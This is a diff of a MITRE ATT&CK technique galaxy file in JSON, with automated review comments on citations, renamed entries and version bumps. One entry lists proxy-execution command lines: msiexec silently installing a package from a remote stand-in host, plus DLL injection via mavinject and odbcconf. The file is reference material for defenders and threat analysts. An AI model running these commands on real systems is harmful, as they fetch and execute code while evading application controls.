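Review bot: In the -1706 hunk the sentence terminator was dropped when the citations were moved, so `...physically connected PC(Citation: Wang-ExploitingUSB)(Citation: ArsTechnica-PoisonTap) This technique has been demonstrated on Android.` runs two sentences together. Suggest `...physically connected PC. (Citation: Wang-ExploitingUSB) (Citation: ArsTechnica-PoisonTap) This technique has been demonstrated on Android.` so the citations close the first sentence as they do elsewhere in the file.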
@@ -1932,7 +1936,7 @@
 "value": "Automated system performs requested action - T1384"
 },
 {
- "description": "If network traffic between the mobile device and remote servers is unencrypted or is encrypted in an insecure manner, then an adversary positioned on the network can eavesdrop on communication. For example, He et al. (Citation: mHealth) describe numerous healthcare-related applications that did not properly protect network communication.",
+ "description": "If network traffic between the mobile device and remote servers is unencrypted or is encrypted in an insecure manner, then an adversary positioned on the network can eavesdrop on communication.(Citation: mHealth)",
 "meta": {
 "external_id": "APP-1",
 "kill_chain": [
@@ -2037,7 +2041,7 @@
 "value": "Compromise of externally facing system - T1388"
 },
 {
- "description": "An attacker could jam radio signals (e.g. Wi-Fi, cellular, GPS) to prevent the mobile device from communicating. (Citation: NIST-SP800187)",
+ "description": "An attacker could jam radio signals (e.g. Wi-Fi, cellular, GPS) to prevent the mobile device from communicating. (Citation: NIST-SP800187)(Citation: CNET-Celljammer)(Citation: NYTimes-Celljam)(Citation: Digitaltrends-Celljam)(Citation: Arstechnica-Celljam)",
 "meta": {
 "external_id": "GPS-0",
 "kill_chain": [
@@ -2053,7 +2057,11 @@
 "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-8.html",
 "https://pages.nist.gov/mobile-threat-catalogue/lan-pan-threats/LPN-5.html",
 "https://pages.nist.gov/mobile-threat-catalogue/gps-threats/GPS-0.html",
- "http://csrc.nist.gov/publications/drafts/800-187/sp800_187_draft.pdf"
+ "http://csrc.nist.gov/publications/drafts/800-187/sp800_187_draft.pdf",
+ "https://www.cnet.com/news/man-put-cell-phone-jammer-in-car-to-stop-driver-calls-fcc-says/",
+ "https://www.nytimes.com/2007/11/04/technology/04jammer.html",
+ "https://www.digitaltrends.com/mobile/florida-teacher-punished-after-signal-jamming-his-students-cell-phones/",
+ "https://arstechnica.com/tech-policy/2016/03/man-accused-of-jamming-passengers-cell-phones-on-chicago-subway/"
 ]
 },
 "uuid": "d2e112dc-f6d4-488d-b8df-ecbfb57a0a2d",
@@ -2080,7 +2088,7 @@
 "value": "Lock User Out of Device - T1446"
 },
 {
- "description": "An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.g. Google's Android Device Manager or Apple iCloud's Find my iPhone) or to an enterprise mobility management (EMM) / mobile device management (MDM) server console could use that access to track mobile devices.",
+ "description": "An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.g. Google's Android Device Manager or Apple iCloud's Find my iPhone) or to an enterprise mobility management (EMM) / mobile device management (MDM) server console could use that access to track mobile devices.(Citation: Krebs-Location)",
 "meta": {
 "external_id": "EMM-7",
 "kill_chain": [
@@ -2093,7 +2101,8 @@
 "refs": [
 "https://attack.mitre.org/techniques/T1468",
 "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html",
- "https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html"
+ "https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html",
+ "https://krebsonsecurity.com/2018/05/tracking-firm-locationsmart-leaked-location-data-for-customers-of-all-major-u-s-mobile-carriers-in-real-time-via-its-web-site/"
 ]
 },
 "uuid": "6f86d346-f092-4abc-80df-8558a90c426a",
@@ -2184,6 +2193,38 @@
 "uuid": "58d0b955-ae3d-424a-a537-2804dab38793",
 "value": "Unconditional client-side exploitation/Injected Website/Driveby - T1372"
 },
+ {
+ "description": "Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)\n\nAdversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. 
(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)\n\nSeveral tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)",
+ "meta": {
+ "external_id": "T1171",
+ "kill_chain": [
+ "mitre-attack:credential-access"
+ ],
+ "mitre_data_sources": [
+ "Windows event logs",
+ "Windows Registry",
+ "Packet capture",
+ "Netflow/Enclave netflow"
+ ],
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1171",
+ "https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution",
+ "https://technet.microsoft.com/library/cc958811.aspx",
+ "https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html",
+ "https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html",
+ "https://github.com/nomex/nbnspoof",
+ "https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response",
+ "https://github.com/SpiderLabs/Responder",
+ "https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning",
+ "https://github.com/Kevin-Robertson/Conveigh"
+ ]
+ },
+ "uuid": "0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0",
+ "value": "LLMNR/NBT-NS Poisoning and Relay - T1171"
+ },
 {
 "description": "Google and Apple provide Google Cloud Messaging and Apple Push Notification Service, respectively, services designed to enable efficient communication between third-party mobile app backend servers and the mobile apps running on individual devices. These services maintain an encrypted connection between every mobile device and Google or Apple that cannot easily be inspected and must be allowed to traverse networks as part of normal device operation. These services could be used by adversaries for communication to compromised mobile devices. 
(Citation: Securelist Mobile Malware 2013) (Citation: DroydSeuss)",
 "meta": {
@@ -2229,7 +2270,7 @@
 "value": "Standard Non-Application Layer Protocol - T1095"
 },
 {
- "description": "An adversary could set up unauthorized Wi-Fi access points or compromise existing access points and, if the device connects to them, carry out network-based attacks such as eavesdropping on or modifying network communication as described in NIST SP 800-153 (Citation: NIST-SP800153). \n\nFor example, Kaspersky describes a threat actor they call DarkHotel that targeted hotel Wi-Fi networks, using them to compromise computers belonging to business executives (Citation: Kaspersky-DarkHotel).",
+ "description": "An adversary could set up unauthorized Wi-Fi access points or compromise existing access points and, if the device connects to them, carry out network-based attacks such as eavesdropping on or modifying network communication(Citation: NIST-SP800153)(Citation: Kaspersky-DarkHotel).",
 "meta": {
 "external_id": "LPN-0",
 "kill_chain": [
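Review bot: Adding a new cluster entry (T1171) should be accompanied by an increment of the file's top-level `version` value so that MISP instances that cache this galaxy refresh it; the bump is not inside this chunk, so confirm it is present in a hunk outside this view. Separately, the new entry's `refs` list carries two URLs (the sternsecurity post and the Conveigh repository) that have no matching `(Citation: …)` marker in the description while the others do; that is acceptable if they are intentional detection references, but worth a glance since a reader cannot tell which statement they support.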
@@ -2250,7 +2291,7 @@
 "value": "Rogue Wi-Fi Access Points - T1465"
 },
 {
- "description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, [Scripting](https://attack.mitre.org/techniques/T1064), [PowerShell](https://attack.mitre.org/techniques/T1086), or by using utilities present on the system.\n\nOne such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia)\n\nAnother example is using the Windows copy /b command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)\n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used with [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.",
+ "description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. 
Methods for doing that include built-in functionality of malware, [Scripting](https://attack.mitre.org/techniques/T1064), [PowerShell](https://attack.mitre.org/techniques/T1086), or by using utilities present on the system.\n\nOne such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia)\n\nAnother example is using the Windows copy /b command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)\n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used with [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.",
 "meta": {
 "external_id": "T1140",
 "kill_chain": [
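Review bot: The rewritten description keeps the grammatical error `Adversaries may also used compressed or archived scripts, such as Javascript.` from the old text; since the commit already replaces this line, it is the right moment to change it to `Adversaries may also use compressed or archived scripts, such as Javascript.`. As rendered here the old and new sides read identically, so the change is presumably whitespace-only; if so, a fix to the sentence would give the hunk a visible purpose.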
@@ -2266,8 +2307,8 @@
 ],
 "refs": [
 "https://attack.mitre.org/techniques/T1140",
- "https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/",
 "https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/",
+ "https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/",
 "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/"
 ]
 },
@@ -2668,10 +2709,10 @@
 "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html",
 "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf",
 "https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/",
- "https://github.com/danielbohannon/Revoke-Obfuscation",
- "https://github.com/itsreallynick/office-crackros",
 "https://en.wikipedia.org/wiki/Duqu",
- "https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympics/"
+ "https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympics/",
+ "https://github.com/danielbohannon/Revoke-Obfuscation",
+ "https://github.com/itsreallynick/office-crackros"
 ]
 },
 "uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
@@ -2836,7 +2877,7 @@
 "value": "File System Permissions Weakness - T1044"
 },
 {
- "description": "An app could contain malicious code in obfuscated or encrypted form, then deobfuscate or decrypt the code at runtime to evade many app vetting techniques, as described in (Citation: Rastogi) (Citation: Zhou) (Citation: TrendMicro-Obad) (Citation: Xiao-iOS).",
+ "description": "An app could contain malicious code in obfuscated or encrypted form, then deobfuscate or decrypt the code at runtime to evade many app vetting techniques.(Citation: Rastogi) (Citation: Zhou) (Citation: TrendMicro-Obad) (Citation: Xiao-iOS)",
 "meta": {
 "external_id": "APP-21",
 "kill_chain": [
@@ -2856,7 +2897,7 @@
 ]
 },
 "uuid": "d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a",
- "value": "Obfuscated or Encrypted Payload - T1406"
+ "value": "Obfuscated Files or Information - T1406"
 },
 {
 "description": "An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud backup services (e.g. Google's Android backup service or Apple's iCloud) could use that access to obtain sensitive data stored in device backups. For example, the Elcomsoft Phone Breaker product advertises the ability to retrieve iOS backup data from Apple's iCloud (Citation: Elcomsoft-EPPB). Elcomsoft also describes (Citation: Elcomsoft-WhatsApp) obtaining WhatsApp communication histories from backups stored in iCloud.",
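Review bot: In the -2856 hunk the cluster's `value` is renamed from `Obfuscated or Encrypted Payload - T1406` to `Obfuscated Files or Information - T1406` while the `uuid` stays the same; the galaxy tag string that users have already attached to events is derived from `value`, so those tags will no longer match the cluster by name even though uuid-based matching still works. Consider keeping the old name discoverable by adding `"synonyms": ["Obfuscated or Encrypted Payload"]` to this entry's `meta`, unless the galaxy tooling is known to reconcile renames by uuid alone.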
@@ -3123,7 +3164,7 @@ "value": "Exploitation for Credential Access - T1212" }, { - "description": "The (Citation: Microsoft Component Object Model) (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. (Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.", + "description": "The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. 
(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.", "meta": { "external_id": "T1122", "kill_chain": [ 
@@ -3191,7 +3232,7 @@
 ]
 },
 "uuid": "dd818ea5-adf5-41c7-93b5-f3b839a219fb",
- "value": "Local Network Connections Discovery - T1421"
+ "value": "System Network Connections Discovery - T1421"
 },
 {
 "description": "Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming) When used maliciously, Loadable Kernel Modules (LKMs) can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Adversaries can use loadable kernel modules to covertly persist on a system and evade defenses. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)\n\nCommon features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)\n\nKernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. Several examples have been found where this can be used. (Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken) Examples have been found in the wild. (Citation: Securelist Ventir)",
@@ -3277,7 +3318,7 @@ "value": "Signed Script Proxy Execution - T1216" }, { - "description": "Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems. This technique accounts for proxy execution methods that are not already accounted for within the existing techniques.\n\n### Mavinject.exe\nMavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to input a DLL into a running process. (Citation: Twitter gN3mes1s Status Update MavInject32)\n\n\"C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe\" /INJECTRUNNING \nC:\\Windows\\system32\\mavinject.exe /INJECTRUNNING \n\n### SyncAppvPublishingServer.exe\nSyncAppvPublishingServer.exe can be used to run powershell scripts without executing powershell.exe. (Citation: Twitter monoxgas Status Update SyncAppvPublishingServer)\n\nSeveral others binaries exist that may be used to perform similar behavior. (Citation: GitHub Ultimate AppLocker Bypass List)", + "description": "Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems. This technique accounts for proxy execution methods that are not already accounted for within the existing techniques.\n\n### Msiexec.exe\nMsiexec.exe is the command-line Windows utility for the Windows Installer. 
Adversaries may use msiexec.exe to launch malicious MSI files for code execution. An adversary may use it to launch local or network accessible MSI files.(Citation: LOLBAS Msiexec)(Citation: Rancor Unit42 June 2018)(Citation: TrendMicro Msiexec Feb 2018) Msiexec.exe may also be used to execute DLLs.(Citation: LOLBAS Msiexec)\n\n* msiexec.exe /q /i \"C:\\path\\to\\file.msi\"\n* msiexec.exe /q /i http[:]//site[.]com/file.msi\n* msiexec.exe /y \"C:\\path\\to\\file.dll\"\n\n### Mavinject.exe\nMavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to input a DLL into a running process. (Citation: Twitter gN3mes1s Status Update MavInject32)\n\n* \"C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe\" <PID> /INJECTRUNNING <PATH DLL>\n* C:\\Windows\\system32\\mavinject.exe <PID> /INJECTRUNNING <PATH DLL>\n\n### SyncAppvPublishingServer.exe\nSyncAppvPublishingServer.exe can be used to run PowerShell scripts without executing powershell.exe. (Citation: Twitter monoxgas Status Update SyncAppvPublishingServer)\n\n### Odbcconf.exe\nOdbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The utility can be misused to execute functionality equivalent to [Regsvr32](https://attack.mitre.org/techniques/T1117) with the REGSVR option to execute a DLL.(Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)\n\n* odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\file.dll\"}\n\nSeveral other binaries exist that may be used to perform similar behavior. (Citation: GitHub Ultimate AppLocker Bypass List)", "meta": { "external_id": "T1218", "kill_chain": [ 
@@ -3293,8 +3334,15 @@
 ],
 "refs": [
 "https://attack.mitre.org/techniques/T1218",
+ "https://lolbas-project.github.io/lolbas/Binaries/Msiexec/",
+ "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/",
 "https://twitter.com/gn3mes1s/status/941315826107510784",
 "https://twitter.com/monoxgas/status/895045566090010624",
+ "https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-2017",
+ "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/",
 "https://github.com/api0cradle/UltimateAppLockerByPassList"
 ]
 },
@@ -3302,7 +3350,7 @@ "value": "Signed Binary Proxy Execution - T1218" }, { - "description": "The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like CreateProcess(), LoadLibrary(), etc. of the Win32 API. (Citation: Wikipedia Windows Library Files)\n\nThe module loader can load DLLs:\n\n* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;\n \n* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);\n \n* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;\n \n* via in an embedded or external \"application manifest\". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.\n\nAdversaries can use this functionality as a way to execute arbitrary code on a system.", + "description": "The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like CreateProcess(), LoadLibrary(), etc. of the Win32 API. 
(Citation: Wikipedia Windows Library Files)\n\nThe module loader can load DLLs:\n\n* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;\n \n* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);\n \n* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;\n \n* via <file name=\"filename.extension\" loadFrom=\"fully-qualified or relative pathname\"> in an embedded or external \"application manifest\". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.\n\nAdversaries can use this functionality as a way to execute arbitrary code on a system.", "meta": { "external_id": "T1129", "kill_chain": [ 
@@ -3381,24 +3429,6 @@ "uuid": "357e137c-7589-4af1-895c-3fbad35ea4d2", "value": "Obfuscate or encrypt code - T1319" }, - { - "description": "An adversary may encrypt files stored on the mobile device to prevent the user from accessing them, only unlocking access to the files after a ransom is paid. Without escalated privileges, the adversary is generally limited to only encrypting files in external/shared storage locations. This technique has been demonstrated on Android, and we are unaware of any demonstrated use on iOS.", - "meta": { - "external_id": "APP-28", - "kill_chain": [ - "mitre-mobile-attack:effects" - ], - "mitre_platforms": [ - "Android" - ], - "refs": [ - "https://attack.mitre.org/techniques/T1471", - "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-28.html" - ] - }, - "uuid": "d9e88203-2b5d-405f-a406-2933b1e3d7e4", - "value": "Encrypt Files for Ransom - T1471" - }, { "description": "Windows Distributed Component Object Model (DCOM) is transparent middleware that extends the functionality of Component Object Model (COM) (Citation: Microsoft COM) beyond a local computer using remote procedure call (RPC) technology. COM is a component of the Windows application programming interface (API) that enables interaction between software objects. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE).\n\nPermissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry. (Citation: Microsoft COM ACL) (Citation: Microsoft Process Wide Com Keys) (Citation: Microsoft System Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.\n\nAdversaries may use DCOM for lateral movement. 
Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications (Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods. (Citation: Enigma MMC20 COM Jan 2017) (Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents (Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1173) (DDE) execution directly through a COM created instance of a Microsoft Office application (Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.\n\nDCOM may also expose functionalities that can be leveraged during other areas of the adversary chain of activity such as Privilege Escalation and Persistence. (Citation: ProjectZero File Write EoP Apr 2018)",
 "meta": {
@@ -3507,7 +3537,7 @@
 ]
 },
 "uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd",
- "value": "Local Network Configuration Discovery - T1422"
+ "value": "System Network Configuration Discovery - T1422"
 },
 {
 "description": "Analysts identify gap areas that generate a compelling need to generate a Key Intelligence Topic (KIT) or Key Intelligence Question (KIQ). (Citation: BrighthubGapAnalysis) (Citation: ICD115) (Citation: JP2-01)",
@@ -3707,7 +3737,7 @@
 "value": "Post compromise tool development - T1353"
 },
 {
- "description": "Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic.\n\nIn the mobile environment, the Google Cloud Messaging (GCM; two-way) and Apple Push Notification Service (APNS; one-way server-to-device) are commonly used protocols on Android and iOS respectively that would blend in with routine device traffic and are difficult for enterprises to inspect. As described by Kaspersky (Citation: Kaspersky-MobileMalware), Google responds to reports of abuse by blocking access to GCM.",
+ "description": "Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic.\n\nIn the mobile environment, the Google Cloud Messaging (GCM; two-way) and Apple Push Notification Service (APNS; one-way server-to-device) are commonly used protocols on Android and iOS respectively that would blend in with routine device traffic and are difficult for enterprises to inspect. Google reportedly responds to reports of abuse by blocking access to GCM.(Citation: Kaspersky-MobileMalware)",
 "meta": {
 "external_id": "APP-29",
 "kill_chain": [
@@ -3770,7 +3800,7 @@
 "value": "Targeted social media phishing - T1366"
 },
 {
- "description": "If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device's Trusted Execution Environment (TEE) or other similar isolated execution environment where the code can evade detection, may persist after device resets, and may not be removable by the device user. Running code within the TEE may provide an adversary with the ability to monitor or tamper with overall device behavior.\n\nThomas Roth describes the potential for placing a rootkit within the TrustZone secure world (Citation: Roth-Rootkits).",
+ "description": "If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device's Trusted Execution Environment (TEE) or other similar isolated execution environment where the code can evade detection, may persist after device resets, and may not be removable by the device user. Running code within the TEE may provide an adversary with the ability to monitor or tamper with overall device behavior.(Citation: Roth-Rootkits)",
 "meta": {
 "external_id": "APP-27",
 "kill_chain": [
@@ -3791,7 +3821,7 @@
 "value": "Modify Trusted Execution Environment - T1399"
 },
 {
- "description": "A malicious app could use standard Android APIs to send SMS messages. SMS messages could potentially be sent to premium numbers that charge the device owner and generate revenue for an adversary, for example as described by Lookout in (Citation: Lookout-SMS).\n\nOn iOS, apps cannot send SMS messages.\n\nOn Android, apps must hold the SEND_SMS permission to send SMS messages. Additionally, Android version 4.2 and above has mitigations against this threat by requiring user consent before allowing SMS messages to be sent to premium numbers (Citation: AndroidSecurity2014).",
+ "description": "A malicious app could use standard Android APIs to send SMS messages. SMS messages could potentially be sent to premium numbers that charge the device owner and generate revenue for an adversary(Citation: Lookout-SMS).\n\nOn iOS, apps cannot send SMS messages.\n\nOn Android, apps must hold the SEND_SMS permission to send SMS messages. Additionally, Android version 4.2 and above has mitigations against this threat by requiring user consent before allowing SMS messages to be sent to premium numbers (Citation: AndroidSecurity2014).",
 "meta": {
 "external_id": "T1448",
 "kill_chain": [
@@ -3810,7 +3840,7 @@
 "value": "Premium SMS Toll Fraud - T1448"
 },
 {
- "description": "An adversary could cause the mobile device to use less secure protocols, for example by jamming frequencies used by newer protocols such as LTE and only allowing older protocols such as GSM to communicate as described in NIST SP 800-187 (Citation: NIST-SP800187). Use of less secure protocols may make communication easier to eavesdrop upon or manipulate.",
+ "description": "An adversary could cause the mobile device to use less secure protocols, for example by jamming frequencies used by newer protocols such as LTE and only allowing older protocols such as GSM to communicate(Citation: NIST-SP800187). Use of less secure protocols may make communication easier to eavesdrop upon or manipulate.",
 "meta": {
 "external_id": "CEL-3",
 "kill_chain": [
@@ -3830,7 +3860,7 @@
 "value": "Downgrade to Insecure Protocols - T1466"
 },
 {
- "description": "An adversary could set up a rogue cellular base station and then use it to eavesdrop on or manipulate cellular device communication. For example, Ritter and DePerry of iSEC Partners demonstrated this technique using a compromised cellular femtocell at Black Hat USA 2013 (Citation: Computerworld-Femtocell).",
+ "description": "An adversary could set up a rogue cellular base station and then use it to eavesdrop on or manipulate cellular device communication. A compromised cellular femtocell could be used to carry out this technique(Citation: Computerworld-Femtocell).",
 "meta": {
 "external_id": "CEL-7",
 "kill_chain": [
@@ -3850,7 +3880,36 @@ "value": "Rogue Cellular Base Station - T1467" }, { - "description": "The mobile device may be targeted for exploitation through its interface to cellular networks or other radio interfaces.\n\n### Baseband Vulnerability Exploitation\n\nA message sent over a radio interface (typically cellular, but potentially Bluetooth, GPS, NFC, Wi-Fi or other) to the mobile device could exploit a vulnerability in code running on the device. D. Komaromy and N. Golde demonstrated baseband exploitation of a Samsung mobile device at the PacSec 2015 security conference. (Citation: Register-BaseStation) Weinmann described and demonstrated \"the risk of remotely exploitable memory corruptions in cellular baseband stacks.\" (Citation: Weinmann-Baseband)\n\n### Malicious SMS Message\n\nAn SMS message could contain content designed to exploit vulnerabilities in the SMS parser on the receiving device. For example, Mulliner and Miller demonstrated such an attack against the iPhone in 2009. (Citation: Forbes-iPhoneSMS) An SMS message could also contain a link to a web site containing malicious content designed to exploit the device web browser. Vulnerable SIM cards may be remotely exploited and reprogrammed via SMS messages. (Citation: SRLabs-SIMCard)", + "description": "Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. 
